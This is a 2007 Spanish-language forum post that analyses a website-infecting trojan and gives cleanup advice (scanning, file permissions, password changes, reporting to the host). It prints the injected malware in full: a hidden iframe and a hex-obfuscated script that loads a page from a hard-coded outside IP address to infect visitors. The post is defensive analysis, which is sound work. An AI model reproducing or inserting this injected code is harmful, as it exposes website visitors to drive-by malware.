Tema: Javascript desencriptar - Detectar de donde es el virus!
Ver Mensaje Individual
  #2 (permalink)  
Antiguo 13/12/2007, 12:06
Avatar de agustinradillo
agustinradillo
 
Fecha de Ingreso: diciembre-2007
Mensajes: 1
Antigüedad: 17 años, 3 meses
Puntos: 0
De acuerdo <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
Saludos a todos si efectivamente es un Virus / Troyano que adjunta este codigo a todos los archivos index, default y home con extenciones htm, html, PHP, ASP en algunos casos se coloca en el <HEAD> o justo depues de la eiqueta <BODY> y en los archivos PHP justo alfinal de la etiquta "?>"

este es el ingenioso scrip
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function v1147600cb1140e6(v1147600cb114cc9){ return(parseInt(v1147600cb114cc9,16));}
function v1147600cb1173da(v1147600cb117ba8){ var v47600cb11837c='';
for(v1147600cb1191b3=0; v1147600cb1191b3<v1147600cb117ba8.length; v1147600cb1191b3+=2){ v1147600cb11837c+=(String.fromCharCode(v1147600cb1 140e6(v1147600cb117ba8.substr(v1147600cb1191b3, 2))));}
return v47600cb11837c;}
document.write(v1147600cb1173da('3C5343524950543E7 7696E646F772E7374617475733D27446F6E65273B646F63756 D656E742E777269746528273C696672616D65206E616D653D3 033393264207372633D5C27687474703A2F2F37372E3232312 E3133332E3138382F2E69662F676F2E68746D6C3F272B4D617 4682E726F756E64284D6174682E72616E646F6D28292A31353 5353834292B2731353761343161383663655C2720776964746 83D373034206865696768743D323231207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F696672616D653E2 7293C2F5343524950543E'));
</script>

Al parecer es de origen RUSO y los ataques aparentemente biene de todo aquel que tenga acceso al sitio o este infectado los ataques tabien son remotos en intervalos de 4 a 8 hrs. Este virus se propaga mediante bug (error deprogramacion) del Internet Explorer para ejecutar un archivo ejecutable (EXE) e instalarse en la Pc´s. Que raro que tenga bug´s el IE.

En un segundo foro tiene parte de la solucion gracias "Panino5001"

Las recomendaciones son la sigueintes:
1.- Checar que su PC y su red de que No esten infectados. Recomiendo usar (hijackthis, AD-Aware AVG-Antivirus)
2.- Cambiar atributos de los archivos de los archivos index, home y default de 777 a 644 mediante chmod.
3.- Cambiar usuarios y passwords de Cpanel y FTP.
4.- Checar todas las carpetas en busca de archivos index, home y default que esten infectados ejemplo:
www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html

Otra recomendacion es reportarlo a su Host manager y usar un buen antivirus para eliminarlo.
Tabien usar Firefox pues no ejecuta este scrip malicioso, "Dios bendiga al Firefox".
mas informacion sobre el tema y del virus en:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HTML%5FIFRAME%2ECX&VSect=P

http://forums.digitalpoint.com/showthread.php?t=596009

Última edición por agustinradillo; 15/01/2008 a las 19:58 Razón: mas datos sobre HTML_iframe.cx